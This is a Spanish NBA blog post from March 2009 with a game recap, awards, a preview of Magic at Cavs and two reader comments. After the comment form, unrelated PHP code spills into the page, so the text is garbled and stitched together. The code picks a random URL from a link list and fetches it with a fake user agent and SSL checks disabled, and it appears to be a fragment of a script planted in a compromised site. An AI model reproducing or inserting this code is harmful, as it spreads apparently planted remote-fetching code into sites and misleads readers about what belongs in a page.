La crónica (16/03/2009)

17 de March de 2009 por txusma

Anoche nos sentimos un tanto huérfanos sin ningún representante de ese “trío” en discordia. Es innegable que San Antonio, a fuerza de realizar actuaciones bastante “reguleras”, ha logrado situarse en un segundo plano en el que ellos siempre se han sentido más cómodos. Los focos se concentran en Lakers, Celtics, LeBron, Wade… y parece que en cierto modo los tejanos quedan al margen. Eso en año impar y con tantos ingredientes como el que más para lograr el campeonato. El precio de todo ello, por ejemplo, fue la derrota de anoche frente los Thunder en el partido número 1.000 de Popovich, aunque no tenemos claro si al viejo zorro le quitó mucho el sueño esta incidencia.

Como decíamos, no disfrutamos de los Lebron, Wade, Kobe, etc… pero lo hicimos de Ron “el último guerrero” Artest. Sin Yao, estuvo comedido tirándose únicamente 23 mandarinas con una sensacional racha de 0-9 en triples (anda que se cortaba, el tío) y a pesar de todo logró ser el máximo anotador de su equipo (como a él le gusta) llevándolo a la victoria en una plaza nada fácil como es Nueva Orleans. En frente Chris Paul como el llanero solitario, al frente de una banda que ha perdido el fuelle del trade fallido.

Por el contrario, quien ha recuperado el color han sido los Nuggets, con importante aportación de su rotación reflejada en el rendimiento de Balkman. No jugó Devin Harris por lesión y Vicente no lo pudo hacer todo en los Nets.

El otro equipo que salió beneficiado de la derrota de los Hornets fue Portland. No lo tenían demasiado complicado contra los Grizzlies y cuajaron, en general, un buen partido colectivamente hablando. Eso sí, a los españoles ni los mentamos.

Por último, los Bobcats crujieron a los Raptors a los que les quedan ya muy pocas balas. Próximamente certificaremos el fracaso. Noche fatídica para los nuestros.

PREMIOS

MVP:Hoy ha sido uno de esos partidos en los que Gerald Wallace ha estado brillante, al menos estadísticamente hablando. Sus 25 puntos (8 de 13 en tiros), 9 rebotes, 5 asistencias, 3 robos y un tapón han sido claves para destrozar a los Raptors.

Rookie: Colaborando en el destrozo también ha destacado DJ Augustine con 15 puntos y 6 asistencias. Otro rookie merecedor de mención ha sido OJ Mayo que ha tenido que ver como sus 21 puntos y 6 asistencias no servían para llevarse la victoria.

Sorpresa: No es lo mismo pero los 17 puntos (6 de 11 en tiro) y 6 asistencias de Keyon Dooling se parece a lo que aporta Devin Harris en los Nets.

Decepción: Repasando la aportacion de los españoles esta madrugada te das cuenta que ninguno ha estado especialmente fino. Eso sí, el premio para Sergio Rodríguez que no ha disputado ni un minuto.

El mayor esfuerzo en vano: De bases va el premio. Tanto Chris Paul como Tony Parker han visto como se les escapaban de las manos las victorias. A lo mejor las guardan para Playoffs.

RAZONES PARA TRASNOCHAR

De los ocho partidos que se jugarán durante la próxima madrugada, uno destaca por encima del resto.

Magic @ Cavs. El Quicken Loans es la pista más complicada de la liga, con una sola victoria visitante en lo que va de temporada. ¿Qué mejor contexto para reafirmarse como un candidato? Los Magic visitan Cleveland esta medianoche (GMT+1) con el objetivo de lograr una victoria que nos convenza a todos de su condición de candidato a alcanzar, al menos, una Finales de Conferencia. Los Cavs, con 5 victorias seguidas y 14 en los últimos 16 partidos, han sufrido últimamente más de la cuenta para ganar a equipos claramente inferiores como Knicks, Kings o Clippers. Una victoria hoy sería un golpe de autoridad casi definitivo para hacerse con el trono del Este.

Recomendamos, además, prestar especial atención a… Baron Davis. Su temporada, de lo más decepcionante del año, vivirá esta noche un momento especial: su primera visita al Oracle Arena desde que abandonara los Warriors para enrolarse en los Clippers. Buena ocasión, pues, para reivindicarse y mostrarnos al magnífico jugador que es.

LA PREGUNTA DEL DÍA

¿Están reservando ya energías en el Oeste de cara a los Playoffs?

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    No creo que se estén reservando, y menos teniendo en cuenta que un buen tramo final de regular season no sólo te evita a los Lakers y Spurs, sino que incluso te da ventaja de campo en primera ronda. Y eso es fundamental con lo igualado que parece todo.

      Citar

  2. Jabho dice:
    #2

    Si, parece pronto para dejarse llevar. Lakers busca el primer puesto de la regular con los Cavs y mientras dure esa lucha supongo que no se relajaran del todo, el resto andan muy enmarañados y evitar a Lakers o Spurs en primera ronda ya es mucho premio para el resto…

    En el Este como decís si ganan hoy los Cavs dejan lejos a Magic y C´s y casi tienen seguro ganar la conferencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>